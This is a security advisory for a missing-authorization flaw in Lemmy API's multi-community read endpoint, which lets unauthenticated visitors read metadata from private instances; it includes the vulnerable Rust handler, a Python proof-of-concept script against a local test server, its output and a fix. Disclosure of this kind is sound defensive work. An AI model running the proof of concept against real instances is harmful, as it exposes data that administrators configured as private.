PT-2026-41494 · Crates.Io · Lemmy Api

Publicado

2026-05-06

·

Atualizado

2026-05-06

CVSS v3.1

5.3

Média

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
NOTE: Only affects development version.

Summary

read multi community() does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists.

Details

Other read handlers load local site and call check private instance() before returning data to unauthenticated callers. read multi community() does not call that helper:
rust
pub async fn read multi community(
 Query(data): Query<GetMultiCommunity>,
 context: Data<LemmyContext>,
 local user view: Option<LocalUserView>,
) -> LemmyResult<Json<GetMultiCommunityResponse>> {
 let my person id = local user view.as ref().map(|l| l.person.id);
 let id = resolve multi community identifier(&data.name, data.id, &context, &local user view)
  .await?
  .ok or(LemmyErrorType::NoIdGiven)?;
 let multi community view =
  MultiCommunityView::read(&mut context.pool(), id, my person id).await?;
get community(), list posts(), list comments(), read person(), search(), and resolve object() all enforce the private-instance guard.

Proof of Concept

The script creates a multi-community whose metadata contains a marker, turns on private instance, confirms a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over GET /multi community without authentication.
python
#!/usr/bin/env python3
import json, random, string
import requests

BASE    = "http://127.0.0.1:8536/api/v4"
ADMIN USER = "lemmy"
ADMIN PASS = "lemmylemmy"

def api(method, path, token=None, **kw):
  h = kw.pop("headers", {})
  if token: h["Authorization"] = "Bearer " + token
  return requests.request(method, BASE + path, headers=h, **kw)

suffix = "multi" + "".join(random.choice(string.ascii lowercase) for  in range(6))
secret = "SECRET MULTI " + suffix

admin = api("POST", "/account/auth/login", json={"username or email": ADMIN USER, "password": ADMIN PASS}).json()["jwt"]

# Create a multi-community whose title/summary/sidebar embed the marker.
mid = api("POST", "/multi community", admin, json={
  "name": "m" + suffix, "title": secret,
  "summary": secret + " summary", "sidebar": secret + " sidebar",
}).json()["multi community view"]["multi"]["id"]

# Enable private instance.
api("PUT", "/site", admin, json={"private instance": True})

print("private instance:", api("GET", "/site").json()["site view"]["local site"]["private instance"])

# Control: a comparable read endpoint correctly rejects unauthenticated callers.
control = api("GET", "/community/list")
print("unauth /community/list (control):", control.status code, control.text[:120])

# Leak: read multi community returns the private metadata to an unauthenticated caller.
leak = api("GET", "/multi community", params={"id": mid})
print("unauth /multi community:", leak.status code, leak.text[:300])
print("contains secret:", secret in leak.text)
Output:
text
private instance: True
unauth /community/list (control): 400 {"error":"instance is private","cause":"InstanceIsPrivate"}
unauth /multi community: 200 {"multi community view":{"multi":{"title":"SECRET MULTI multijwxokm","summary":"SECRET MULTI multijwxokm summary","sidebar":"SECRET MULTI multijwxokm sidebar"}}}
contains secret: True
The control request shows the privacy setting is active. The multi-community endpoint still returns the private metadata.

Impact

An unauthenticated visitor can read multi-community metadata from an instance whose admin configured the site as private. The exposed fields include names, titles, summaries, sidebars, owner identities, and member community lists.

Recommended Fix

Load local site at the start of read multi community() and call check private instance(&local user view, &local site)? before resolving or reading the multi-community.
Found by aisafe.io

Correção

Missing Authorization

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-862

Identificadores relacionados

GHSA-JMXC-HHWX-GVV3

Produtos afetados

Lemmy Api